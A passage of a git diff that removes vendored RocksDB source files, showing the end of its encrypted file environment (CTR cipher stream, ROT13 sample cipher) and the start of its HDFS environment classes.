-  // Indicates the upper layers if the current WritableFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const override { return file_->use_direct_io(); }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { return file_->GetRequiredBufferAlignment(); } 
-
-    /*
-   * Get the size of valid data in the file.
-   */
-  virtual uint64_t GetFileSize() override {
-    return file_->GetFileSize() - prefixLength_;
-  }
-
-  // Truncate is necessary to trim the file to the correct size
-  // before closing. It is not always possible to keep track of the file
-  // size due to whole pages writes. The behavior is undefined if called
-  // with other writes to follow.
-  virtual Status Truncate(uint64_t size) override {
-    return file_->Truncate(size + prefixLength_);
-  }
-
-    // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  // This call has no effect on dirty pages in the cache.
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset + prefixLength_, length);
-  }
-
-  // Sync a file range with disk.
-  // offset is the starting byte of the file range to be synchronized.
-  // nbytes specifies the length of the range to be synchronized.
-  // This asks the OS to initiate flushing the cached data to disk,
-  // without waiting for completion.
-  // Default implementation does nothing.
-  virtual Status RangeSync(uint64_t offset, uint64_t nbytes) override { 
-    return file_->RangeSync(offset + prefixLength_, nbytes);
-  }
-
-  // PrepareWrite performs any necessary preparation for a write
-  // before the write actually occurs.  This allows for pre-allocation
-  // of space on devices where it can result in less file
-  // fragmentation and/or less waste from over-zealous filesystem
-  // pre-allocation.
-  virtual void PrepareWrite(size_t offset, size_t len) override {
-    file_->PrepareWrite(offset + prefixLength_, len);
-  }
-
-  // Pre-allocates space for a file.
-  virtual Status Allocate(uint64_t offset, uint64_t len) override {
-    return file_->Allocate(offset + prefixLength_, len);
-  }
-};
-
-// A file abstraction for random reading and writing.
-class EncryptedRandomRWFile : public RandomRWFile {
-  private:
-    std::unique_ptr<RandomRWFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    size_t prefixLength_;
-
- public:
-  EncryptedRandomRWFile(RandomRWFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-    : file_(f), stream_(s), prefixLength_(prefixLength) {}
-
-  // Indicates if the class makes use of direct I/O
-  // If false you must pass aligned buffer to Write()
-  virtual bool use_direct_io() const override { return file_->use_direct_io(); }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { 
-    return file_->GetRequiredBufferAlignment(); 
-  }
-
-  // Write bytes in `data` at  offset `offset`, Returns Status::OK() on success.
-  // Pass aligned buffer when use_direct_io() returns true.
-  virtual Status Write(uint64_t offset, const Slice& data) override {
-    AlignedBuffer buf;
-    Status status;
-    Slice dataToWrite(data); 
-    offset += prefixLength_;
-    if (data.size() > 0) {
-      // Encrypt in cloned buffer
-      buf.Alignment(GetRequiredBufferAlignment());
-      buf.AllocateNewBuffer(data.size());
-      memmove(buf.BufferStart(), data.data(), data.size());
-      status = stream_->Encrypt(offset, buf.BufferStart(), data.size());
-      if (!status.ok()) {
-        return status;
-      }
-      dataToWrite = Slice(buf.BufferStart(), data.size());
-    }
-    status = file_->Write(offset, dataToWrite);
-    return status;
-  }
-
-  // Read up to `n` bytes starting from offset `offset` and store them in
-  // result, provided `scratch` size should be at least `n`.
-  // Returns Status::OK() on success.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const override { 
-    assert(scratch);
-    offset += prefixLength_;
-    auto status = file_->Read(offset, n, result, scratch);
-    if (!status.ok()) {
-      return status;
-    }
-    status = stream_->Decrypt(offset, (char*)result->data(), result->size());
-    return status;
-  }
-
-  virtual Status Flush() override {
-    return file_->Flush();
-  }
-
-  virtual Status Sync() override {
-    return file_->Sync();
-  }
-
-  virtual Status Fsync() override { 
-    return file_->Fsync();
-  }
-
-  virtual Status Close() override {
-    return file_->Close();
-  }
-};
-
-// EncryptedEnv implements an Env wrapper that adds encryption to files stored on disk.
-class EncryptedEnv : public EnvWrapper {
- public:
-  EncryptedEnv(Env* base_env, EncryptionProvider *provider)
-      : EnvWrapper(base_env) {
-    provider_ = provider;
-  }
-
-  // NewSequentialFile opens a file for sequential reading.
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   std::unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_reads) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<SequentialFile> underlying;
-    auto status = EnvWrapper::NewSequentialFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Read prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Read prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      status = underlying->Read(prefixLength, &prefixSlice, prefixBuf.BufferStart());
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<SequentialFile>(new EncryptedSequentialFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // NewRandomAccessFile opens a file for random read access.
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_reads) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<RandomAccessFile> underlying;
-    auto status = EnvWrapper::NewRandomAccessFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Read prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Read prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      status = underlying->Read(0, prefixLength, &prefixSlice, prefixBuf.BufferStart());
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<RandomAccessFile>(new EncryptedRandomAccessFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-  
-  // NewWritableFile opens a file for sequential writing.
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<WritableFile> underlying;
-    Status status = EnvWrapper::NewWritableFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Initialize prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-      prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-      // Write prefix 
-      status = underlying->Append(prefixSlice);
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<WritableFile>(new EncryptedWritableFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status ReopenWritableFile(const std::string& fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<WritableFile> underlying;
-    Status status = EnvWrapper::ReopenWritableFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Initialize prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-      prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-      // Write prefix 
-      status = underlying->Append(prefixSlice);
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<WritableFile>(new EncryptedWritableFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // Reuse an existing file by renaming it and opening it as writable.
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<WritableFile> underlying;
-    Status status = EnvWrapper::ReuseWritableFile(fname, old_fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Initialize prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-      prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-      // Write prefix 
-      status = underlying->Append(prefixSlice);
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<WritableFile>(new EncryptedWritableFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // Open `fname` for random read and write, if file dont exist the file
-  // will be created.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_reads || options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Check file exists
-    bool isNewFile = !FileExists(fname).ok();
-
-    // Open file using underlying Env implementation
-    std::unique_ptr<RandomRWFile> underlying;
-    Status status = EnvWrapper::NewRandomRWFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Read or Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      if (!isNewFile) {
-        // File already exists, read prefix
-        status = underlying->Read(0, prefixLength, &prefixSlice, prefixBuf.BufferStart());
-        if (!status.ok()) {
-          return status;
-        }
-      } else {
-        // File is new, initialize & write prefix 
-        provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-        prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-        // Write prefix 
-        status = underlying->Write(0, prefixSlice);
-        if (!status.ok()) {
-          return status;
-        }
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<RandomRWFile>(new EncryptedRandomRWFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-    // Store in *result the attributes of the children of the specified directory.
-  // In case the implementation lists the directory prior to iterating the files
-  // and files are concurrently deleted, the deleted files will be omitted from
-  // result.
-  // The name attributes are relative to "dir".
-  // Original contents of *results are dropped.
-  // Returns OK if "dir" exists and "*result" contains its children.
-  //         NotFound if "dir" does not exist, the calling process does not have
-  //                  permission to access "dir", or if "dir" is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status GetChildrenFileAttributes(const std::string& dir, std::vector<FileAttributes>* result) override {
-    auto status = EnvWrapper::GetChildrenFileAttributes(dir, result);
-    if (!status.ok()) {
-      return status;
-    }
-    size_t prefixLength = provider_->GetPrefixLength();
-    for (auto it = std::begin(*result); it!=std::end(*result); ++it) {
-      assert(it->size_bytes >= prefixLength);
-      it->size_bytes -= prefixLength;
-    }
-    return Status::OK();
- }
-
-  // Store the size of fname in *file_size.
-  virtual Status GetFileSize(const std::string& fname, uint64_t* file_size) override {
-    auto status = EnvWrapper::GetFileSize(fname, file_size);
-    if (!status.ok()) {
-      return status;
-    }
-    size_t prefixLength = provider_->GetPrefixLength();
-    assert(*file_size >= prefixLength);
-    *file_size -= prefixLength;
-    return Status::OK();    
-  }
-
- private:
-  EncryptionProvider *provider_;
-};
-
-
-// Returns an Env that encrypts data when stored on disk and decrypts data when 
-// read from disk.
-Env* NewEncryptedEnv(Env* base_env, EncryptionProvider* provider) {
-  return new EncryptedEnv(base_env, provider);
-}
-
-// Encrypt one or more (partial) blocks of data at the file offset.
-// Length of data is given in dataSize.
-Status BlockAccessCipherStream::Encrypt(uint64_t fileOffset, char *data, size_t dataSize) {
-  // Calculate block index
-  auto blockSize = BlockSize();
-  uint64_t blockIndex = fileOffset / blockSize;
-  size_t blockOffset = fileOffset % blockSize;
-  unique_ptr<char[]> blockBuffer;
-
-  std::string scratch;
-  AllocateScratch(scratch);
-
-  // Encrypt individual blocks.
-  while (1) {
-    char *block = data;
-    size_t n = std::min(dataSize, blockSize - blockOffset);
-    if (n != blockSize) {
-      // We're not encrypting a full block. 
-      // Copy data to blockBuffer
-      if (!blockBuffer.get()) {
-        // Allocate buffer 
-        blockBuffer = unique_ptr<char[]>(new char[blockSize]);
-      }
-      block = blockBuffer.get();
-      // Copy plain data to block buffer 
-      memmove(block + blockOffset, data, n);
-    }
-    auto status = EncryptBlock(blockIndex, block, (char*)scratch.data());
-    if (!status.ok()) {
-      return status;
-    }
-    if (block != data) {
-      // Copy encrypted data back to `data`.
-      memmove(data, block + blockOffset, n);
-    }
-    dataSize -= n;
-    if (dataSize == 0) {
-      return Status::OK();
-    }
-    data += n;
-    blockOffset = 0;
-    blockIndex++;
-  }
-}
-
-// Decrypt one or more (partial) blocks of data at the file offset.
-// Length of data is given in dataSize.
-Status BlockAccessCipherStream::Decrypt(uint64_t fileOffset, char *data, size_t dataSize) {
-  // Calculate block index
-  auto blockSize = BlockSize();
-  uint64_t blockIndex = fileOffset / blockSize;
-  size_t blockOffset = fileOffset % blockSize;
-  unique_ptr<char[]> blockBuffer;
-
-  std::string scratch;
-  AllocateScratch(scratch);
-
-  // Decrypt individual blocks.
-  while (1) {
-    char *block = data;
-    size_t n = std::min(dataSize, blockSize - blockOffset);
-    if (n != blockSize) {
-      // We're not decrypting a full block. 
-      // Copy data to blockBuffer
-      if (!blockBuffer.get()) {
-        // Allocate buffer 
-        blockBuffer = unique_ptr<char[]>(new char[blockSize]);
-      }
-      block = blockBuffer.get();
-      // Copy encrypted data to block buffer 
-      memmove(block + blockOffset, data, n);
-    }
-    auto status = DecryptBlock(blockIndex, block, (char*)scratch.data());
-    if (!status.ok()) {
-      return status;
-    }
-    if (block != data) {
-      // Copy decrypted data back to `data`.
-      memmove(data, block + blockOffset, n);
-    }
-    dataSize -= n;
-    if (dataSize == 0) {
-      return Status::OK();
-    }
-    data += n;
-    blockOffset = 0;
-    blockIndex++;
-  }
-}
-
-// Encrypt a block of data.
-// Length of data is equal to BlockSize().
-Status ROT13BlockCipher::Encrypt(char *data) {
-  for (size_t i = 0; i < blockSize_; ++i) {
-      data[i] += 13;
-  }
-  return Status::OK();
-}
-
-// Decrypt a block of data.
-// Length of data is equal to BlockSize().
-Status ROT13BlockCipher::Decrypt(char *data) {
-  return Encrypt(data);
-}
-
-// Allocate scratch space which is passed to EncryptBlock/DecryptBlock.
-void CTRCipherStream::AllocateScratch(std::string& scratch) {
-  auto blockSize = cipher_.BlockSize();
-  scratch.reserve(blockSize);
-}
-
-// Encrypt a block of data at the given block index.
-// Length of data is equal to BlockSize();
-Status CTRCipherStream::EncryptBlock(uint64_t blockIndex, char *data, char* scratch) {
-
-  // Create nonce + counter
-  auto blockSize = cipher_.BlockSize();
-  memmove(scratch, iv_.data(), blockSize);
-  EncodeFixed64(scratch, blockIndex + initialCounter_);
-
-  // Encrypt nonce+counter 
-  auto status = cipher_.Encrypt(scratch);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // XOR data with ciphertext.
-  for (size_t i = 0; i < blockSize; i++) {
-    data[i] = data[i] ^ scratch[i];
-  }
-  return Status::OK();
-}
-
-// Decrypt a block of data at the given block index.
-// Length of data is equal to BlockSize();
-Status CTRCipherStream::DecryptBlock(uint64_t blockIndex, char *data, char* scratch) {
-  // For CTR decryption & encryption are the same 
-  return EncryptBlock(blockIndex, data, scratch);
-}
-
-// GetPrefixLength returns the length of the prefix that is added to every file
-// and used for storing encryption options.
-// For optimal performance, the prefix length should be a multiple of 
-// the a page size.
-size_t CTREncryptionProvider::GetPrefixLength() {
-  return defaultPrefixLength;
-}
-
-// decodeCTRParameters decodes the initial counter & IV from the given
-// (plain text) prefix.
-static void decodeCTRParameters(const char *prefix, size_t blockSize, uint64_t &initialCounter, Slice &iv) {
-  // First block contains 64-bit initial counter
-  initialCounter = DecodeFixed64(prefix);
-  // Second block contains IV
-  iv = Slice(prefix + blockSize, blockSize);
-}
-
-// CreateNewPrefix initialized an allocated block of prefix memory 
-// for a new file.
-Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) {
-  // Create & seed rnd.
-  Random rnd((uint32_t)Env::Default()->NowMicros());
-  // Fill entire prefix block with random values.
-  for (size_t i = 0; i < prefixLength; i++) {
-    prefix[i] = rnd.Uniform(256) & 0xFF;
-  }
-  // Take random data to extract initial counter & IV
-  auto blockSize = cipher_.BlockSize();
-  uint64_t initialCounter;
-  Slice prefixIV;
-  decodeCTRParameters(prefix, blockSize, initialCounter, prefixIV);
-
-  // Now populate the rest of the prefix, starting from the third block.
-  PopulateSecretPrefixPart(prefix + (2 * blockSize), prefixLength - (2 * blockSize), blockSize);
-
-  // Encrypt the prefix, starting from block 2 (leave block 0, 1 with initial counter & IV unencrypted)
-  CTRCipherStream cipherStream(cipher_, prefixIV.data(), initialCounter);
-  auto status = cipherStream.Encrypt(0, prefix + (2 * blockSize), prefixLength - (2 * blockSize));
-  if (!status.ok()) {
-    return status;
-  }
-  return Status::OK();
-}
-
-// PopulateSecretPrefixPart initializes the data into a new prefix block 
-// in plain text.
-// Returns the amount of space (starting from the start of the prefix)
-// that has been initialized.
-size_t CTREncryptionProvider::PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize) {
-  // Nothing to do here, put in custom data in override when needed.
-  return 0;
-}
-
-Status CTREncryptionProvider::CreateCipherStream(const std::string& fname, const EnvOptions& options, Slice &prefix, unique_ptr<BlockAccessCipherStream>* result) {
-  // Read plain text part of prefix.
-  auto blockSize = cipher_.BlockSize();
-  uint64_t initialCounter;
-  Slice iv;
-  decodeCTRParameters(prefix.data(), blockSize, initialCounter, iv);
-
-  // Decrypt the encrypted part of the prefix, starting from block 2 (block 0, 1 with initial counter & IV are unencrypted)
-  CTRCipherStream cipherStream(cipher_, iv.data(), initialCounter);
-  auto status = cipherStream.Decrypt(0, (char*)prefix.data() + (2 * blockSize), prefix.size() - (2 * blockSize));
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Create cipher stream 
-  return CreateCipherStreamFromPrefix(fname, options, initialCounter, iv, prefix, result);
-}
-
-// CreateCipherStreamFromPrefix creates a block access cipher stream for a file given
-// given name and options. The given prefix is already decrypted.
-Status CTREncryptionProvider::CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options,
-    uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr<BlockAccessCipherStream>* result) {
-  (*result) = unique_ptr<BlockAccessCipherStream>(new CTRCipherStream(cipher_, iv.data(), initialCounter));
-  return Status::OK();
-}
-
-#endif // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env_hdfs.cc b/thirdparty/rocksdb/env/env_hdfs.cc
deleted file mode 100644
index d98020c..0000000
--- a/thirdparty/rocksdb/env/env_hdfs.cc
+++ /dev/null
@@ -1,612 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include "rocksdb/env.h"
-#include "hdfs/env_hdfs.h"
-
-#ifdef USE_HDFS
-#ifndef ROCKSDB_HDFS_FILE_C
-#define ROCKSDB_HDFS_FILE_C
-
-#include <algorithm>
-#include <stdio.h>
-#include <sys/time.h>
-#include <time.h>
-#include <iostream>
-#include <sstream>
-#include "rocksdb/status.h"
-#include "util/string_util.h"
-
-#define HDFS_EXISTS 0
-#define HDFS_DOESNT_EXIST -1
-#define HDFS_SUCCESS 0
-
-//
-// This file defines an HDFS environment for rocksdb. It uses the libhdfs
-// api to access HDFS. All HDFS files created by one instance of rocksdb
-// will reside on the same HDFS cluster.
-//
-
-namespace rocksdb {
-
-namespace {
-
-// Log error message
-static Status IOError(const std::string& context, int err_number) {
-  return (err_number == ENOSPC) ?
-      Status::NoSpace(context, strerror(err_number)) :
-      Status::IOError(context, strerror(err_number));
-}
-
-// assume that there is one global logger for now. It is not thread-safe,
-// but need not be because the logger is initialized at db-open time.
-static Logger* mylog = nullptr;
-
-// Used for reading a file from HDFS. It implements both sequential-read
-// access methods as well as random read access methods.
-class HdfsReadableFile : virtual public SequentialFile,
-                         virtual public RandomAccessFile {
- private:
-  hdfsFS fileSys_;
-  std::string filename_;
-  hdfsFile hfile_;
-
- public:
-  HdfsReadableFile(hdfsFS fileSys, const std::string& fname)
-      : fileSys_(fileSys), filename_(fname), hfile_(nullptr) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile opening file %s\n",
-                    filename_.c_str());
-    hfile_ = hdfsOpenFile(fileSys_, filename_.c_str(), O_RDONLY, 0, 0, 0);
-    ROCKS_LOG_DEBUG(mylog,
-                    "[hdfs] HdfsReadableFile opened file %s hfile_=0x%p\n",
-                    filename_.c_str(), hfile_);
-  }
-
-  virtual ~HdfsReadableFile() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile closing file %s\n",
-                    filename_.c_str());
-    hdfsCloseFile(fileSys_, hfile_);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile closed file %s\n",
-                    filename_.c_str());
-    hfile_ = nullptr;
-  }
-
-  bool isValid() {
-    return hfile_ != nullptr;
-  }
-
-  // sequential access, read data at current offset in file
-  virtual Status Read(size_t n, Slice* result, char* scratch) {
-    Status s;
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile reading %s %ld\n",
-                    filename_.c_str(), n);
-
-    char* buffer = scratch;
-    size_t total_bytes_read = 0;
-    tSize bytes_read = 0;
-    tSize remaining_bytes = (tSize)n;
-
-    // Read a total of n bytes repeatedly until we hit error or eof
-    while (remaining_bytes > 0) {
-      bytes_read = hdfsRead(fileSys_, hfile_, buffer, remaining_bytes);
-      if (bytes_read <= 0) {
-        break;
-      }
-      assert(bytes_read <= remaining_bytes);
-
-      total_bytes_read += bytes_read;
-      remaining_bytes -= bytes_read;
-      buffer += bytes_read;
-    }
-    assert(total_bytes_read <= n);
-
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile read %s\n",
-                    filename_.c_str());
-
-    if (bytes_read < 0) {
-      s = IOError(filename_, errno);
-    } else {
-      *result = Slice(scratch, total_bytes_read);
-    }
-
-    return s;
-  }
-
-  // random access, read data from specified offset in file
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const {
-    Status s;
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile preading %s\n",
-                    filename_.c_str());
-    ssize_t bytes_read = hdfsPread(fileSys_, hfile_, offset,
-                                   (void*)scratch, (tSize)n);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile pread %s\n",
-                    filename_.c_str());
-    *result = Slice(scratch, (bytes_read < 0) ? 0 : bytes_read);
-    if (bytes_read < 0) {
-      // An error: return a non-ok status
-      s = IOError(filename_, errno);
-    }
-    return s;
-  }
-
-  virtual Status Skip(uint64_t n) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile skip %s\n",
-                    filename_.c_str());
-    // get current offset from file
-    tOffset current = hdfsTell(fileSys_, hfile_);
-    if (current < 0) {
-      return IOError(filename_, errno);
-    }
-    // seek to new offset in file
-    tOffset newoffset = current + n;
-    int val = hdfsSeek(fileSys_, hfile_, newoffset);
-    if (val < 0) {
-      return IOError(filename_, errno);
-    }
-    return Status::OK();
-  }
-
- private:
-
-  // returns true if we are at the end of file, false otherwise
-  bool feof() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile feof %s\n",
-                    filename_.c_str());
-    if (hdfsTell(fileSys_, hfile_) == fileSize()) {
-      return true;
-    }
-    return false;
-  }
-
-  // the current size of the file
-  tOffset fileSize() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile fileSize %s\n",
-                    filename_.c_str());
-    hdfsFileInfo* pFileInfo = hdfsGetPathInfo(fileSys_, filename_.c_str());
-    tOffset size = 0L;
-    if (pFileInfo != nullptr) {
-      size = pFileInfo->mSize;
-      hdfsFreeFileInfo(pFileInfo, 1);
-    } else {
-      throw HdfsFatalException("fileSize on unknown file " + filename_);
-    }
-    return size;
-  }
-};
-
-// Appends to an existing file in HDFS.
-class HdfsWritableFile: public WritableFile {
- private:
-  hdfsFS fileSys_;
-  std::string filename_;
-  hdfsFile hfile_;
-
- public:
-  HdfsWritableFile(hdfsFS fileSys, const std::string& fname)
-      : fileSys_(fileSys), filename_(fname) , hfile_(nullptr) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile opening %s\n",
-                    filename_.c_str());
-    hfile_ = hdfsOpenFile(fileSys_, filename_.c_str(), O_WRONLY, 0, 0, 0);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile opened %s\n",
-                    filename_.c_str());
-    assert(hfile_ != nullptr);
-  }
-  virtual ~HdfsWritableFile() {
-    if (hfile_ != nullptr) {
-      ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closing %s\n",
-                      filename_.c_str());
-      hdfsCloseFile(fileSys_, hfile_);
-      ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closed %s\n",
-                      filename_.c_str());
-      hfile_ = nullptr;
-    }
-  }
-
-  // If the file was successfully created, then this returns true.
-  // Otherwise returns false.
-  bool isValid() {
-    return hfile_ != nullptr;
-  }
-
-  // The name of the file, mostly needed for debug logging.
-  const std::string& getName() {
-    return filename_;
-  }
-
-  virtual Status Append(const Slice& data) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Append %s\n",
-                    filename_.c_str());
-    const char* src = data.data();
-    size_t left = data.size();
-    size_t ret = hdfsWrite(fileSys_, hfile_, src, left);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Appended %s\n",
-                    filename_.c_str());
-    if (ret != left) {
-      return IOError(filename_, errno);
-    }
-    return Status::OK();
-  }
-
-  virtual Status Flush() {
-    return Status::OK();
-  }
-
-  virtual Status Sync() {
-    Status s;
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Sync %s\n",
-                    filename_.c_str());
-    if (hdfsFlush(fileSys_, hfile_) == -1) {
-      return IOError(filename_, errno);
-    }
-    if (hdfsHSync(fileSys_, hfile_) == -1) {
-      return IOError(filename_, errno);
-    }
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Synced %s\n",
-                    filename_.c_str());
-    return Status::OK();
-  }
-
-  // This is used by HdfsLogger to write data to the debug log file
-  virtual Status Append(const char* src, size_t size) {
-    if (hdfsWrite(fileSys_, hfile_, src, size) != (tSize)size) {
-      return IOError(filename_, errno);
-    }
-    return Status::OK();
-  }
-
-  virtual Status Close() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closing %s\n",
-                    filename_.c_str());
